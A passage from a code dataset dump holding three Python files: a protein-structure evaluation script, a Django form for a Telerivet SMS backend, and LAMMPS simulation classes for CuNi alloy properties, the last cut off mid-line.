'%s.txt' % filename)) as f:\r\n# seq = f.read()\r\n# cb = np.load(os.path.join(PATH, 'cb', '%s.npy' % filename))\r\n\r\n# sincos_fuse = []\r\n# for i in range(10):\r\n# train_name = 'image_Conv-LSTM-Split_AdamWAmsgrad(lre3)_MSE_10fold_%s' % i\r\n\r\n# OUTPUT_PATH = './outputs/%s/test_output' % train_name\r\n# model_names = os.listdir(OUTPUT_PATH)\r\n\r\n# for model_name in model_names[:3]:\r\n# model_path = os.path.join(OUTPUT_PATH, model_name)\r\n# sincos_output = np.load(os.path.join(\r\n# model_path, '%s.npy' % filename))\r\n# sincos_fuse.append(sincos_output)\r\n\r\n# sincos_fuse = np.array(sincos_fuse)\r\n# sincos_fuse = np.mean(np.array(sincos_fuse), axis=0)\r\n# tor_fuse = process.sincos2tor(sincos_fuse)\r\n# nrmsd = process.tor2RMSD(coo, seq, cb, tor_fuse)\r\n\r\n# nrmsds.append(nrmsd)\r\n# nrmsds = np.array(nrmsds)\r\n# np.save('./outputs/%s_rmsd.npy' % train_name[:-2], nrmsds)\r\n\r\n\r\ndef examine_model(train_name, model_name, save=False):\r\n model_output_path = './outputs/%s/test_output/%s' % (\r\n train_name, model_name)\r\n rmsds = []\r\n gdts = []\r\n ramas = []\r\n\r\n filenames = os.listdir(model_output_path)\r\n for filename in filenames:\r\n filename = filename[:-4]\r\n coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n with open(os.path.join(PATH, 'seq', '%s.txt' % filename)) as f:\r\n seq = f.read()\r\n cb = np.load(os.path.join(PATH, 'cb', '%s.npy' % filename))\r\n\r\n out = np.load(os.path.join(model_output_path, '%s.npy' % filename))\r\n tor = process.sincos2tor(out)\r\n rmsd, gdt, rama = process.cal_criterias(coo, seq, cb, tor)\r\n\r\n rmsds.append(rmsd)\r\n gdts.append(gdt)\r\n ramas.append(rama)\r\n\r\n rmsds = np.array(rmsds)\r\n gdts = np.array(gdts)\r\n ramas = np.array(ramas)\r\n\r\n if save:\r\n np.save('./results/rmsd/%s_%s.npy' % (train_name, model_name), rmsds)\r\n np.save('./results/gdt/%s_%s.npy' % (train_name, model_name), gdts)\r\n np.save('./results/rama/%s_%s.npy' % (train_name, model_name), ramas)\r\n else:\r\n return rmsds, gdts, ramas\r\n\r\n\r\ndef examine_train(train_name, fuse_model=True, save=True, print_brief=True, multifold_fusing=False):\r\n train_output_path = './outputs/%s/test_output' % train_name\r\n model_names = os.listdir(train_output_path)\r\n\r\n if fuse_model:\r\n if 'fuse' not in model_names:\r\n model_paths = [os.path.join(train_output_path, model_name)\r\n for model_name in model_names]\r\n fused_outputs, filenames = process.fuse_output(model_paths)\r\n fused_path = os.path.join(train_output_path, 'fuse')\r\n pathlib.Path(fused_path).mkdir(parents=True, exist_ok=True)\r\n for output, filename in zip(fused_outputs, filenames):\r\n np.save(os.path.join(fused_path, filename), output)\r\n model_names += ['fuse']\r\n\r\n rmsds = []\r\n gdts = []\r\n ramas = []\r\n model_names.sort()\r\n for model_name in model_names:\r\n rmsd, gdt, rama = examine_model(train_name, model_name)\r\n\r\n rmsds.append(rmsd)\r\n gdts.append(gdt)\r\n ramas.append(rama)\r\n\r\n rmsds = np.array(rmsds)\r\n gdts = np.array(gdts)\r\n ramas = np.array(ramas)\r\n\r\n if print_brief:\r\n print(model_names)\r\n print(np.round(np.mean(rmsds, 1), 3))\r\n print(np.round(np.mean(np.mean(gdts, 1), -1), 3))\r\n print(np.round(np.mean(ramas, 1), 3))\r\n\r\n if save:\r\n np.save('./results/rmsd/%s.npy' % train_name, rmsds)\r\n np.save('./results/gdt/%s.npy' % train_name, gdts)\r\n np.save('./results/rama/%s.npy' % train_name, ramas)\r\n if multifold_fusing:\r\n global_output_paths = ['%s/test_output/%s' % (train_name, model_name)\r\n for model_name in model_names if model_name != 'fuse']\r\n return global_output_paths\r\n else:\r\n return rmsds, gdts, ramas\r\n\r\n\r\ndef examine_multifold_train(train_name, folds=10, multifold_fusing=True, save=True, print_brief=True):\r\n global_output_path = './outputs'\r\n\r\n if multifold_fusing:\r\n output_paths = []\r\n for i in range(folds):\r\n output_paths += examine_train('%s_%s' % (train_name, i),\r\n multifold_fusing=multifold_fusing, print_brief=False)\r\n\r\n model_paths = [os.path.join(global_output_path, output_path)\r\n for output_path in output_paths]\r\n fused_outputs, filenames = process.fuse_output(model_paths)\r\n fused_path = os.path.join(\r\n global_output_path, '%s/test_output/fuse' % train_name)\r\n pathlib.Path(fused_path).mkdir(parents=True, exist_ok=True)\r\n for output, filename in zip(fused_outputs, filenames):\r\n np.save(os.path.join(fused_path, filename), output)\r\n\r\n rmsd, gdt, rama = examine_model(train_name, 'fuse')\r\n\r\n if print_brief:\r\n print(np.round(np.mean(rmsd, 0), 3))\r\n print(np.round(np.mean(np.mean(gdt, 0), -1), 3))\r\n print(np.round(np.mean(rama, 0), 3))\r\n\r\n if save:\r\n np.save('./results/rmsd/%s_fuse.npy' % train_name, rmsd)\r\n np.save('./results/gdt/%s_fuse.npy' % train_name, gdt)\r\n np.save('./results/rama/%s_fuse.npy' % train_name, rama)\r\n else:\r\n return rmsd, gdt, rama\r\n else:\r\n for i in range(folds):\r\n examine_train('%s_%s' % (train_name, i))\r\n\r\n\r\nexam_name = str(input('exam_name='))\r\n# examine_multifold_train(exam_name)\r\nexamine_train(exam_name)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275516104","text":"from django.forms.fields import *\nfrom corehq.apps.sms.forms import BackendForm\nfrom dimagi.utils.django.fields import TrimmedCharField\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _, ugettext_noop\nfrom crispy_forms import layout as crispy\n\nclass TelerivetBackendForm(BackendForm):\n api_key = TrimmedCharField(\n label=ugettext_noop(\"API Key\"),\n )\n project_id = TrimmedCharField(\n label=ugettext_noop(\"Project ID\"),\n )\n phone_id = TrimmedCharField(\n label=ugettext_noop(\"Phone ID\"),\n )\n webhook_secret = TrimmedCharField(\n label=ugettext_noop(\"Webhook Secret\"),\n )\n\n @property\n def gateway_specific_fields(self):\n return crispy.Fieldset(\n _(\"Telerivet (Android) Settings\"),\n 'api_key',\n 'project_id',\n 'phone_id',\n 'webhook_secret',\n )\n\n def clean_webhook_secret(self):\n # Circular import\n from corehq.apps.telerivet.models import TelerivetBackend\n value = self.cleaned_data.get(\"webhook_secret\", None)\n backend = TelerivetBackend.by_webhook_secret(value)\n if backend is not None and backend._id != self._cchq_backend_id:\n raise ValidationError(_(\"Already in use.\"))\n return value\n\n","sub_path":"corehq/apps/telerivet/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355136765","text":"import utils\nfrom random import randint\nimport dataFileGenerator as dataF\nimport inFiles as inF\nimport pandas as pd\nfrom scipy.stats import linregress\nimport numpy as np\nimport os\nimport csv\nsh = os.system # I am running this on a bash terminal. If running in windows, you will have to rewrite any sh() calls to the correct strings.\n\n \nclass simulation():\n \"\"\"\n The simulation class is meant to hold all of the parameters one would vary across a lammps md simulation in the npt or nvt ensemble.\n It is also capable to running the simulations.\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [100,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [6,],temperatures = [300,],pressures = [0,],lengths = [6*3.63,],concPercents = [30,],timeStep = 0.0001,simType = \"npt\",fileName = \"CuNi\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.Template\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n \tself.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n self.logFile = logFile\n return \n\n def setSimParams(self,lib = \"\",lammps = \"\",alloy = \"\",latticeConst = 0.0,latticeType = \"\",numAtomTypes = 0,runTimes = [],systemSizes = [],temperatures = [],pressures = [],lengths = [],concPercents = [],timeStep = 0.0,simType = \"\",fileName = \"\", potentialFile = \"\",inTemplate = \"\",copyDir = \"\",logFile = \"\"):\n \"\"\"\n Change any of the initial parameters. Any unspecifies paramters are automatically unchanged.\n \"\"\"\n if lib:\n self.lib = lib\n if lammps:\n self.lammps = lammps\n if alloy:\n self.alloy = alloy\n if latticeConst:\n self.latticeConst = latticeConst\n if latticeType:\n self.latticeType = latticeType\n if numAtomTypes:\n self.numAtomTypes = numAtomTypes\n if any(runTimes):\n self.runTimes = runTimes\n if any(systemSizes):\n self.systemSizes = systemSizes\n if any(temperatures):\n self.temperatures = temperatures\n if any(pressures):\n self.pressures = pressures\n if any(lengths):\n self.lengths = lengths\n if any(concPercents):\n self.concPercents = concPercents\n if timeStep:\n self.timeStep = timeStep\n if simType:\n self.simType = simType\n if inTemplate:\n self.inTemplate = inTemplate\n if fileName:\n self.fileName = fileName\n if potentialFile:\n self.potentialFile = potentialFile\n if copyDir:\n self.copyDir = copyDir\n if logFile:\n self.logFile = logFile\n return \n\n\n\n\n\n def cpTemplate(self,wd):\n \"\"\"\n This function copies all of the files in copyDir to the working directory.\n \"\"\"\n sh(\"cp \" + self.copyDir + \"/* \" + wd)\n return \n \n \n def inFile(self):\n \"\"\"\n Returns the name of the lammps in file to be created and used in the simulations.\n \"\"\"\n return \"in.\" + self.fileName\n\n def dataFile(self):\n \"\"\"\n Returns the name of the atom data file to be created and used in the simulations.\n \"\"\"\n return \"data.\" + self.fileName\n\n def pythonLib(self):\n \"\"\"\n Returns the path to python library.\n \"\"\"\n return self.lib+\"/PyScripts\"\n\n def awkLib(self): \n \"\"\"\n awk is a linux function for quick file reading and editing. It is used to make lammps output more easily readable. \n See cleanOutput for more about specific awk files used.\n \"\"\"\n return self.lib+\"/AwkFiles\"\n\n def runLammps(self):\n \"\"\"\n Command line call to run lammps.\n \"\"\"\n sh(self.lammps + \" \" + self.inFile())\n return \n\n\n\n\n\n\nclass GrainBdry(simulation):\n \"\"\"\n This class is meant to run simulations to get the energy due to an interface between two misaligned crystal structures for a range of temperatures and concentrations of CuNi\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [10,],alloy = \"custom\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in range(100,2501,100)],pressures = [0,],lengths = [],concPercents = [x for x in range(0,101,10)],orientations = [[1,0,0,0,1,0,0,0,1],],timeStep = 0.0005,simType = \"\",fileName = \"grainBdry\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.grainBdryTemplate\",copyDir = \"./In\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.orientations = orientations\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n def setOrientations(self,orientations):\n self.orientations = orientations\n return\n\n \n\n def getWorkDir(self,time,size,temp,press,concPercent,orientation):\n \"\"\"\n This function returns the path to the directory in which a simulation will be run.\n \"\"\"\n o = orientation\n orientStr = \"%d%d%d-%d%d%d-%d%d%d\" %(o[0],o[1],o[2],o[3],o[4],o[5],o[6],o[7],o[8])\n return \"Out/RunTime\" + str(int(time)) + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(concPercent)) + \"Press\" + str(int(press)) + \"Orient\" + orientStr\n\n def runGBSims(self):\n cwd = os.getcwd()\n sh(\"mkdir Out\")\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for press in self.pressures:\n for conc in self.concPercents:\n for orient in self.orientations:\n wd = self.getWorkDir(time,size,temp,press,conc,orient)\n sh(\"mkdir \" + wd)\n self.cpTemplate(wd)\n os.chdir(wd)\n nums = [3,1,2]\n lets = [\"x\",\"y\",\"z\"]\n o = [\"%s%d equal %d\" %(lets[i//3],nums[(i+1)%3],orient[i]) for i in range(9)]\n inFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),\"PRESSURE equal \" + str(press),\"RANDOM equal \" + str(randint(1000000,99999999)),\"CONC equal \" + str(conc),\"A equal \" + str(self.latticeConst),\"SYSTEMSIZE equal \" + str(size)] + o)\n self.runLammps()\n os.chdir(cwd)\n return\n\n def dataFile(self): # This override the simulation method becasue the grainbdry sim does not use a data file\n return\n\n\n\n\nclass elastic(simulation):\n \"\"\"\n This class is meant to run simulations to get the elastic constants over a range of temperatures and \n concentrations\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [1,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in range(100,2501,100)],pressures = [],lengths = [],concPercents = [x for x in range(0,101,10)],timeStep = 0.0005,simType = \"\",fileName = \"elastic\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.elasticTemplate\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.logFile = logFile\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n\n def getWorkDir(self,time,size,temp,concPercent):\n \"\"\"\n This function returns the path to the directory in which a simulation will be run.\n \"\"\"\n return \"Out/RunTime\" + str(int(time)) + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(concPercent))\n\n\n\n def runElasticSims(self):\n cwd = os.getcwd()\n sh(\"mkdir Out\")\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for conc in self.concPercents:\n wd = self.getWorkDir(time,size,temp,conc)\n sh(\"mkdir \" + wd)\n self.cpTemplate(wd)\n os.chdir(wd)\n inFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),\"RANDOM equal \" + str(randint(1000000,99999999))])\n dataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes = self.numAtomTypes, alloyCompPercent = conc)\n dataFile.createDataFile()\n self.runLammps()\n os.chdir(cwd)\n return\n\n\n \n def getElasticConsts(self):\n f = open(self.logFile)\n searchline = \"print \\\"Bulk Modulus = $(v_bulkmodulus) +/- $(v_dbulkmodulus) ${cunits}\\\"\\n\"\n N = -1\n start = False\n values = []\n errors = []\n for line in f:\n if line == searchline:\n N = 1\n if ((N+1)%2):\n sline = line.split()\n if sline[0] == \"Total\":\n pass\n else:\n for i in range(len(sline)):\n if sline[i] == \"=\":\n x = float(sline[i+1])\n elif sline[i] == \"+/-\":\n y = float(sline[i+1])\n values.append(x)\n errors.append(y)\n if N > 0:\n N += 1\n f.close()\n return values,errors\n \n\n\n\n def getElasticData(self):\n cwd = os.getcwd()\n header = [\"Run Time (ps)\",\"N Atoms\",\"Temperature (K)\",\"Concentraition of Cu\",\"Bulk Mod (GPa)\",\"Shear Mod Aniso (GPa)\",\"Shear Mod Iso (GPa)\",\"Poisson\",\"Youngs\",\"Lames\",\"P-Wave\",\"Bulk Mod Error\",\"Shear Mod Aniso Error\",\"Shear Mod Iso Error\",\"Poisson Error\",\"Youngs Error\",\"Lames Error\",\"P-Wave Error\"]\n data = []\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for conc in self.concPercents:\n try:\n d = [time,4*size**3,temp,conc]\n wd = self.getWorkDir(time,size,temp,conc)\n os.chdir(wd)\n temporary=open(self.logFile)\n temporary.close()\n v,e = self.getElasticConsts()\n data.append(d + v + e)\n except:\n pass\n os.chdir(cwd)\n return data, header \n\n\n\n\nclass bulkProp(simulation):\n \"\"\"\n This class allows one to run simulations in NVT or NPT to compute the bulk properties of a material.\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [1,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in range(100,2501,100)],pressures = [0,],lengths = [14*3.6,],concPercents = [x for x in range(0,101,10)],timeStep = 0.0005,simType = \"\",fileName = \"bulk\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.elasticTemplate\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.logFile = logFile\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n\n def setBulkMod(self,latticeConst = \"\"):\n \"\"\"\n Automatically set the simulation parameters to compute the bulk modulus give a lattice spacing.\n \"\"\"\n if latticeConst:\n self.latticeConst = latticeConst\n self.legnths = [x/1000*self.latticeConst for x in range(995,1006)]\n self.temperatures = [1,] + [x for x in range(100,2501,100)]\n self.concPercents = [x for x in range(0,100,10)]\n self.runTimes = [10,] # 10 ps chosen arbitrarily\n self.systemSizes = [10,] #4000 atoms chosen arbitrarily\n self.fileName = \"BulkMod\"\n self.inTemplate = \"in.BulkMod\"\n return\n\n def setHeatCap(self):\n \"\"\"\n Automatically set the simulation parameters to compute the heat capacity.\n \"\"\"\n return\n\n def setThermExp(self):\n \"\"\"\n Automatically set the simulation parameters to compute the thermal expansion coefficient.\n \"\"\"\n return\n \n\n def getWorkDir(self,time,size,temp,pv,concPercent):\n \"\"\"\n This function writes the name of the directory in which the simulation will be run and output. \n The naming is preference and can be changed.\n \"\"\"\n if self.simType == \"npt\":\n return \"Out/RunTime\"+str(time)+\"Size\"+str(size)+\"Conc\"+str(concPercent)+\"Temp\"+str(temp)+\"Press\"+str(round(pv,2))\n elif self.simType == \"nvt\":\n return \"Out/RunTime\"+str(time)+\"Size\"+str(size)+\"Conc\"+str(concPercent)+\"Temp\"+str(temp)+\"Length\"+str(round(pv,2))\n else:\n print(\"Unknown sim type.\")\n return \n \n\n\n def getVolOrPress(self):\n \"\"\"\n Returns either the list of lengths or pressures depending on the simulation type.\n \"\"\"\n if self.simType == \"npt\":\n return self.pressures,\"PRESSURE\"\n elif self.simType == \"nvt\":\n return self.lengths,\"LENGTH\"\n else:\n print(\"Unknown simulation type\")\n return\n\n def runBulkSims(self):\n \"\"\"\n This method runs the lammps simulations over the range of parameters specified in the object.\n \"\"\"\n volOrPress,varString = self.getVolOrPress()\n cwd = os.getcwd()\n sh(\"mkdir Out\") # Where the simulation directories will be stored for organizational purposes.\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n sh(\"mkdir \" + wd) \n self.cpTemplate(wd)\n os.chdir(wd)\n # write the input file and the data file\n inFile = inF.inFile(fileName = self.fileName, readFile = self.inTemplate,runTime = time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),varString + \" equal \" +str(var),\"RANDOM equal \" + str(randint(1000000,9999999))])\n dataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes = self.numAtomTypes, alloyCompPercent = concPercent)\n dataFile.createDataFile()\n self.runLammps()\n os.chdir(cwd)\n return \n \n\n## def cleanOutput(self):\n## \"\"\"\n## This function cleans up lammps output files so that they can be read by a read csv function and jmol.\n## \"\"\"\n## volOrPress = self.getVolOrPress[0]\n## cwd = os.getcwd()\n## for time in self.runTimes:\n## for size in self.systemSizes:\n## for temp in self.temperatures:\n## for var in volOrPress:\n## for concPercent in self.concPercents:\n## wd = self.getWorkDir(time,size,temp,var,concPercent)\n## os.chdir(wd)\n## sh(\"awk -f \" + self.awkLib() + \"/awkReadLog log.run > log.data\") #Removes everything except for header and data from simulation log files\n## try:\n## sh(\"awk -f \" + self.awkLib() + \"/awkReadLog log.loop > log.temp\") #Removes everything except for header and data from simulation log files\n## sh(\"awk -f \" + self.awkLib() + \"/awkCombineLog log.temp > log.loop\") # Removes the extra headers loop files\n## except:\n## pass\n## sh(\"awk -f \" + self.awkLib() + \"/awkFixElementId dump.xyz > dump.pos\") # Changes the names of the atoms in the dump files to Cu and Ni\n## os.chdir(cwd)\n## return \n## \n\n\n def recordData(self,thermoDataFile = \"thermoData\"):\n \"\"\"\n Record the averanges, standard deviations, and standard deviations of the mean for the energy, temperature, pressure, and volume of each simualtion\n in the current directory in a file specified in the input. Defualt is thermoDataFile = \\\"thermoData\\\"\n \"\"\"\n w = open(thermoDataFile,mode = \"w\")\n writer = csv.writer(w,delimiter = \" \")\n volOrPress = self.getVolOrPress()[0]\n header = \"\"\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n os.chdir(wd)\n try:\n if not header:\n data,header = utils.getThermoStats1(self.logFile) # automatically uses log.data as this is the data file after cleanOutput is run\n #data,header = utils.getFinalStats(self.logFile)\n writer.writerow(header)\n writer.writerow(data)\n else:\n data = utils.getThermoStats1(self.logFile)[0]\n #data = utils.getFinalStats(self.logFile)[0]\n writer.writerow(data)\n except:\n pass\n os.chdir(cwd)\n w.close()\n return \n \n \n def getData(self):\n \"\"\"\n Makes a pandas dataframeof the the averanges, standard deviations, and standard deviations of the mean for the\n energy, temperature, pressure, and volume of each simualtion.\n \"\"\"\n volOrPress = self.getVolOrPress()[0]\n df = []\n header = \"\"\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n print(\"Changing to directory %s\" %(wd))\n os.chdir(wd)\n try:\n if not header:\n data,header = utils.getThermoStats1(self.logFile) # Used for reading variables defined in initConv.mod\n print(\"The header of the data is:\")\n print(header)\n #data,header = utils.getFinalStats(self.logFile) # Use this when out is whole sim time average\n df.append(data)\n print(\"Line of Data\")\n print(data)\n else:\n data = utils.getThermoStats1(self.logFile)[0]\n #data = utils.getFinalStats(self.logFile)[0]\n df.append(data)\n print(\"Line of Data\")\n print(data)\n except:\n pass\n os.chdir(cwd)\n print(\"Changing to directory %s\" %(cwd)) \n return pd.DataFrame(df,columns = header)\n\n def getForwDif(self,xString,yString):\n \"\"\"\n This function computes the derivative of thermo variable B with respect to A\n using the forward difference method. A and B shoud be strings any of Volume Energy Press or Temp.\n The output are generated using utils.getThermoStats and utils.dForwDif and are:\n X - list of averages of independent variable in sims\n dX - the uncertainties in X\n Y - list of averages of dependent variable in sims\n dY - the uncertainties in Y\n dYdX - the derivative approximated by forward difference\n ddYdX - the uncertainty in ddYdX\n midX - the midpoint between the values in the X variable\n \"\"\"\n thermoDF = self.getData()\n xSAve = xString+\" ave\"\n xSSTD = xString+\" std\"\n ySAve = yString+\" ave\"\n ySSTD = yString+\" std\"\n thermoDF = thermoDF.sort_values(xSAve)\n X = list(thermoDF[xSAve])\n dX = list(thermoDF[xSSTD]) \n Y = list(thermoDF[ySAve])\n dY = list(thermoDF[ySSTD])\n dYdX,ddYdX,midX = utils.dForwDif(X,dX,Y,dY)\n return X,dX,Y,dY,dYdX,ddYdX,midX\n\n def calcBulkModT(self):\n \"\"\"\n This code takes a dataframe generated by utils.getThermoStats and computes the bulk modulus of the values.\n \"\"\"\n V,dV,P,dP,dPdV,ddPdV,midV = self.getForwDif(\"Volume\",\"Press\")\n N = len(midV)\n bM = np.zeros(N) #Initializing Bulk Modulus\n dbM = np.zeros(N)# Uncertainty in bM\n dmidV = np.zeros(N) # Uncertainty in midV\n bM = [-V[i]*dPdV[i] for i in range(len(dPdV))]\n dbM = [abs(bM[i])*np.sqrt((ddPdV[i]/dPdV[i])**2 + (dV[i]/V[i])**2)]\n return bM,dbM,V[:-1],dV[:-1]\n\n def calcThermExp(self):\n \"\"\"\n This code takes a dataframe generated by utils.getThermoStats and computes the thermal expansion coeff of the values.\n \"\"\"\n T,dT,V,dV,dVdT,ddVdT,midT = self.getForwDif(\"Temp\",\"Volume\")\n N = len(midT)\n tE = [dVdT[i]/V[i] for i in range(len(dVdT))]\n dtE = [abs(tE[i])*np.sqrt((ddVdT[i]/dVdT[i])**2 + (dV[i]/V[i])**2) for i in range(len(tE))]\n return tE,dtE,T[:-1],dT[:-1]\n\n def calcHeatCapV(self):\n \"\"\"\n This code takes a dataframe generated by utils.getThermoStats and computes the heat capacity of the values for constant volume.\n \"\"\"\n T,dT,E,dE,dEdT,ddEdT,midT = self.getForwDif(\"Temp\",\"TotEng\")\n dmidT = np.array((1/2)*sqrt(dT[i+1]**2 + dT[i]**2) for i in range(len(dT) - 1))\n return dEdT,ddEdT,T[:-1],dT[:-1]\n \n def calcHeatCapP(self):\n \"\"\"\n This code takes a dataframe generated by utils.getThermoStats and computes the heat capacity of the values for constant pressure.\n \"\"\"\n T,dT,H,dH,dHdT,ddHdT,midT = self.getForwDif(\"Temp\",\"Enthalpy\")\n dmidT = np.array((1/2)*sqrt(dT[i+1]**2 + dT[i]**2) for i in range(len(dT) - 1))\n return dHdT,ddHdT,T[:-1],dT[:-1]\n\n\n def simQPlot(self,logFile = \"log.data\"):\n \"\"\"\n This function is meant for plotting lammps outputs from the log file over the range of simulations.\n \"\"\"\n volOrPress = self.getVolOrPress()[0]\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n os.chdir(wd)\n print(\"Time: %d, N: %d, T: %0.2f, %s: %0.4f, C: %d\" %(time,size,temp,\"P\" if self.simType == \"npt\" else \"V\",var,concPercent*10))\n qplot(logFile) # A function from utils which gives a \n os.chdir(cwd)\n return \n\n\nclass diffusion(simulation):\n\t\"\"\"\n\tThis class is designed to run simulations to compute a diffusion coefficient\n\tfor a material at a range of concentrations, temperatures, and pressures in \n\tan NPT ensembe.\n\t\"\"\"\n\tdef __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [100,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [6,],temperatures = [300,],pressures = [0,],lengths = [6*3.63,],concPercents = [30,],timeStep = 0.0001,simType = \"npt\",fileName = \"CuNi\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.Template\",copyDir = \"./In\",logFile = \"log.run\"):\n\t\tself.lib = lib \n\t\tself.lammps = lammps\n\t\tself.runTimes = runTimes\n\t\tself.alloy = alloy\n\t\tself.latticeConst = latticeConst\n\t\tself.latticeType = latticeType\n\t\tself.numAtomTypes = numAtomTypes\n\t\tself.systemSizes = systemSizes\n\t\tself.temperatures = temperatures\n\t\tself.pressures = pressures\n\t\tself.lengths = lengths\n\t\tself.concPercents = concPercents\n\t\tself.timeStep = timeStep\n\t\tself.simType = simType\n\t\tself.fileName = fileName\n\t\tself.potentialFile = potentialFile\n\t\tself.inTemplate = inTemplate\n\t\tself.copyDir = copyDir\n\t\tself.logFile = logFile\n\t\treturn \n\n\tdef getWorkDir(self,time,size,temp,press,conc):\n\t\trunTime = str(int(time/self.timeStep))\n\t\treturn \"Out/RunTime\" + runTime + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(conc)) + \"Press\" + str(int(press))\n\n\tdef runDiffSims(self):\n\t\tcwd = os.getcwd()\n\t\tsh(\"mkdir Out\")\n\t\tfor time in self.runTimes:\n\t\t\tfor size in self.systemSizes:\n\t\t\t\tfor temp in self.temperatures:\n\t\t\t\t\tfor press in self.pressures:\n\t\t\t\t\t\tfor conc in self.concPercents:\n\t\t\t\t\t\t\twd = self.getWorkDir(time,size,temp,press,conc)\n\t\t\t\t\t\t\tsh(\"mkdir \"+ wd)\n\t\t\t\t\t\t\tself.cpTemplate(wd)\n\t\t\t\t\t\t\tos.chdir(wd)\n\t\t\t\t\t\t\tinFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = 